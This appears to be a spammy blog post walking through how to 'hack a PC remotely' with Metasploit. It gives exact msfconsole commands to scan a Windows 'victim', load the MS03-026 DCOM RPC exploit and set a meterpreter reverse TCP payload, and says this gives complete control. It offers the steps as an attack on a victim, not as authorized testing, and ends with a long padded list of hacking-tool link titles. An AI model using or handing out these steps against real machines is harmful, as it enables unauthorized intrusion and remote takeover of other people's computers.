2 juin 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related links

  1. Pentest Tools Alternative
  2. Hack Tools 2019
  3. Hacking Tools Download
  4. Pentest Box Tools Download
  5. Pentest Tools For Mac
  6. Hacker Tools Apk
  7. New Hack Tools
  8. Hacking Tools Windows 10
  9. What Is Hacking Tools
  10. Hack Tool Apk
  11. Hacker Tools Github
  12. Game Hacking
  13. Pentest Tools Android
  14. Android Hack Tools Github
  15. Hacks And Tools
  16. Hacker
  17. Pentest Automation Tools
  18. Pentest Tools Review
  19. Hacker Tools Software
  20. How To Make Hacking Tools
  21. Hacking Tools Windows 10
  22. Hacks And Tools
  23. New Hacker Tools
  24. Underground Hacker Sites
  25. Pentest Tools Linux
  26. Hacking Tools Software
  27. Hacking Tools For Beginners
  28. Hacking Tools Windows
  29. Hacker Tools Apk Download
  30. Hacker Tools For Mac
  31. How To Hack
  32. Tools For Hacker
  33. Usb Pentest Tools
  34. Hack Tools
  35. Best Pentesting Tools 2018
  36. Pentest Tools Linux
  37. Hacker Tools For Ios
  38. Hacker Tool Kit
  39. Hacker Tools For Mac
  40. Hacker Hardware Tools
  41. Pentest Tools Website Vulnerability
  42. Hack Tools
  43. Ethical Hacker Tools
  44. Hacker Tools Software
  45. Hacker Tools Software
  46. Pentest Box Tools Download
  47. Hacking Tools Pc
  48. Hak5 Tools
  49. Hack Tools Github
  50. Hacking Tools Github
  51. Pentest Tools List
  52. Hack Apps
  53. Computer Hacker
  54. Hacking Tools
  55. Best Pentesting Tools 2018
  56. Pentest Tools Apk
  57. Hacker Tools For Mac
  58. Hacker Tools
  59. Hacker Tools Hardware
  60. Pentest Tools Open Source
  61. Pentest Tools For Android
  62. Pentest Tools List
  63. Pentest Tools
  64. Hack Tools For Mac
  65. Hack Tools 2019
  66. Usb Pentest Tools
  67. Hack And Tools
  68. Hacker Tools List
  69. Tools Used For Hacking
  70. Hack Apps
  71. Hacking Tools For Pc
  72. Nsa Hacker Tools
  73. Termux Hacking Tools 2019
  74. Pentest Automation Tools

Aucun commentaire: